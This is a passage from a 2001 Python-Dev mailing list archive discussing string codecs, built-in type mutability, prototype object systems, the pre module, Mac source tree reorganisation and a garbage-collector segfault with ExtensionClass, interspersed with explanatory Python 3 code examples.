anyway, just a thought ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 11 11:07:40 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 12:07:40 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> Message-ID: <3AFBB9EC.F75C158D@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > > I may be being dense, but can you explain what's going on here: > > > > > > ->> u'\u00e3'.encode('latin-1') > > > '\xe3' > > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > > Traceback (most recent call last): > > > File "", line 1, in ? > > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > > > The string.decode() method will try to reuse the Unicode > > codecs here. To do this, it will have to convert the string > > to Unicode first and this fails due to the character not being > > in the ASCII range. > > can you take that again? shouldn't michael's example be > equivalent to: > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > if not, I'd argue that your "decode" design is broken, instead > of just buggy... Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec returns a Unicode object (which the .decode() method does). This is what's failing. Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?!
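In Python 3 this problem goes away in a different way. Text and bytes are separate types, and bytes.decode() goes straight from bytes to str with no implicit ASCII step. Bytes-to-bytes transforms such as base64 and hex, and the text-to-text rot13, are reached through codecs.encode()/codecs.decode() rather than through the methods. The sketch below shows present-day behaviour, not the 2001 patch.

```python
import codecs

# Michael's round trip: no intermediate ASCII conversion in Python 3.
raw = "\u00e3".encode("latin-1")
print(raw)                                  # b'\xe3'
print(raw.decode("latin-1") == "\u00e3")    # True

# The failure in the thread came from an implicit ASCII step; doing that
# step explicitly reproduces the same kind of error.
try:
    raw.decode("ascii")
except UnicodeDecodeError as exc:
    print("ASCII step fails:", exc.reason)  # ordinal not in range(128)

# Bytes-to-bytes and text-to-text codecs go through the codecs module.
data = b"data"
encoded = codecs.encode(data, "base64")
print(encoded)                              # b'ZGF0YQ==\n'
print(codecs.decode(encoded, "base64"))     # b'data'
print(codecs.encode(b"\xe3", "hex"))        # b'e3'
print(codecs.encode("hello", "rot13"))      # uryyb
```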
(I would be in favour of this, but I'm not sure whether this is already in use by someone...) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 11 14:31:18 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 08:31:18 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com> Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> > > > Good point. Plain old types currently (in the descr-branch) have a > > > readonly dict (using a proxy) and no settable attributes. I will > > > probably give types settable attributes in a next revision, but I > > > prefer not to make the type's dict writable -- I need to be able to > > > watch the setattr calls so that if someone changes > > > DictType.__getitem__ I can change the mp_subscript to a C function > > > that calls the __getitem__ method. Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then their types have to be shared too! Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000.
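Present-day CPython still enforces the restriction described here. Attributes of static built-in types such as dict cannot be set, and plain instances of built-in types have no __dict__. Subclasses, by contrast, get both a per-instance __dict__ and the ability to override slots like __getitem__. A small sketch follows; the class and helper names are illustrative.

```python
class AnnotatedDict(dict):
    """Subclass of a built-in type: overrides a slot and has a __dict__."""

    def __getitem__(self, key):
        # Subscription on the subclass is routed to this Python method.
        return ("overridden", dict.__getitem__(self, key))


def try_setattr(target, name, value):
    """Return the name of the exception raised by setattr, or "ok"."""
    try:
        setattr(target, name, value)
    except (TypeError, AttributeError) as exc:
        return type(exc).__name__
    return "ok"


if __name__ == "__main__":
    print(try_setattr(dict, "note", 1))  # TypeError (built-in type is immutable)
    print(try_setattr({}, "note", 1))    # AttributeError (no instance __dict__)
    d = AnnotatedDict(a=1)
    print(try_setattr(d, "note", 1))     # ok (subclass instances have a __dict__)
    print(d["a"])                        # ('overridden', 1)
    print(d.get("a"))                    # 1 (dict.get does not call __getitem__)
```

The last line shows that overriding one slot does not redirect every C-level method that happens to look up items. Only operations dispatched through the overridden slot see the Python method.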
Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g@Virginia.EDU Fri May 11 14:43:32 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 09:43:32 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> Message-ID: Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the list of real world uses of Don's Metaclass hack that Tim questioned. Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes. Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.) Classes are necessary for statically typed O-O languages, but IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'd urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!) BTW: XlispStat, which has a prototype object system with multiple inheritance also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes.
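Python's closest analogue to XlispStat's call-next-method is cooperative super(). Each call goes to the next class in the instance's method resolution order (MRO), which is not necessarily the textual base class. The sketch below uses an illustrative diamond hierarchy.

```python
class Base:
    def describe(self):
        return ["Base"]


class Left(Base):
    def describe(self):
        # super() means "next class in the MRO of type(self)", not "Base".
        return ["Left"] + super().describe()


class Right(Base):
    def describe(self):
        return ["Right"] + super().describe()


class Child(Left, Right):
    def describe(self):
        return ["Child"] + super().describe()


if __name__ == "__main__":
    print([cls.__name__ for cls in Child.__mro__])  # ['Child', 'Left', 'Right', 'Base', 'object']
    print(Child().describe())                       # ['Child', 'Left', 'Right', 'Base']
```

When called on a Child, Left's super() call reaches Right rather than Base. A hard-coded call to the base class cannot express this.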
I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. ( There's no class variables -- there's no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases. -- Steve Majewski From nas@python.ca Fri May 11 15:06:39 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 11 May 2001 07:06:39 -0700 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700 References: Message-ID: <20010511070639.A1402@glacier.fnational.com> noreply@sourceforge.net wrote: > Module objects currently don't define the tp_getattro > or tp_setattro slots. As a result, interning of > attribute names does them no good: a char* is always > passed, so the dict lookup always needs to do a string > compare despite that the attribute name is interned. I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this? Neil From guido@digicool.com Fri May 11 16:13:56 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 10:13:56 -0500 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST." <20010511070639.A1402@glacier.fnational.com> References: <20010511070639.A1402@glacier.fnational.com> Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com> > I think this is a problem in classobject.c:generic_binary_op as > well. PyObject_GetAttrString is always used. I believe the old > code interned names like "__add__" and used PyObject_GetAttr. Is > it worth fixing this? Maybe. 
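The interning point in this thread rests on one fact: an interned string is a single shared object. A dictionary lookup with an interned key can therefore match on identity before it falls back to comparing characters. When the name arrives as a char*, the key is a fresh string object, so the characters must be compared. The small illustration below uses sys.intern. The runtime-built name exists only so that the compiler cannot share a constant.

```python
import sys

# Build the same name at runtime so the compiler cannot share a constant.
built = "".join(["__", "add", "__"])
literal = "__add__"

print(built == literal)                          # True: equal contents
print(sys.intern(built) is sys.intern(literal))  # True: one shared object after interning

table = {sys.intern(literal): "slot"}
print(table[sys.intern(built)])                  # slot
```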
I'd give this low priority. If my descriptor branch work goes well, most of classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-) --Guido van Rossum (home page: http://www.python.org/~guido/) From jack@oratrix.nl Fri May 11 15:29:24 2001 From: jack@oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:29:24 +0200 Subject: [Python-Dev] Mac CVS repository moved to sourceforge Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl> Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suffices to build MacPython. I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear. Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From martin@loewis.home.cs.tu-berlin.de Fri May 11 15:41:33 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 11 May 2001 16:41:33 +0200 Subject: [Python-Dev] Mac hierarchy backwards Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing. It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators.
*/ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake@acm.org Fri May 11 15:55:33 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just searched developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack@oratrix.nl Fri May 11 15:56:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v. Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g.
I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in its MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But it's easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From Samuele Pedroni Fri May 11 15:56:48 2001 From: Samuele Pedroni (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi. > > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree, I often read that Smalltalk is "simple" up to metaclasses, on the other hand the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage.
> > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: a python instance I has data slots and a parent slot __class__, a python class C has data slots and a list parent slot __bases__, and then we have the python rules (not very uniform): function from I directly => function; function from I.__class__ => bound method; function from C => unbound method. That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller@ion-tof.com Fri May 11 16:40:10 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful?
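Samuele's three lookup rules can still be observed in a current interpreter. The following is a small sketch in Python 3 (not the 2.1 interpreter discussed in this thread), with hypothetical names `describe`, `C` and `i`. One rule has changed since 2001: unbound methods were removed, so a function fetched through the class is now the plain function.

```python
import types


def describe(self=None):
    # A plain function; `self` defaults to None so it can also be
    # called without an instance.
    return "describe called"


class C:
    pass


C.method = describe   # function stored in the class (the parent slot)
i = C()
i.attr = describe     # the same function stored in the instance itself

# Rule 1: found directly in the instance -> the plain function, not bound.
print(i.attr is describe)                       # True
# Rule 2: found via i.__class__ -> a bound method carrying the instance.
print(isinstance(i.method, types.MethodType))   # True
print(i.method.__self__ is i)                   # True
# Rule 3: fetched from the class itself. Python 2 returned an "unbound
# method" here; Python 3 dropped those and returns the plain function.
print(C.method is describe)                     # True
```

The asymmetry between rules 1 and 2 comes from functions acting as descriptors only when found on the type. That is the part a prototype model, where instances and classes are both just objects with parent slots, would have to special-case to stay compatible.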
The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake@acm.org Fri May 11 17:25:54 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g@Virginia.EDU Fri May 11 17:29:30 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to go thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, Metrowerks *compiler* and IDE for the Mac does include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there.
-- Steve Majewski From guido@digicool.com Fri May 11 19:47:38 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were forced to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the meantime (weren't those related to the backtracking implementation)? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Fri May 11 21:41:30 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget set using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention which it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know: 1.
Disabling gc gets rid of the segfault 2. I only see the problem with importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault. 3. If I first import the gtk module, then import my module, I get no segfault. 4. Most changes I make to the module causing the problem cause the problem to disappear. All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem. Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870
"/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", 
fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at ../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from 
/lib/libc.so.6 From guido@digicool.com Fri May 11 22:49:00 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I 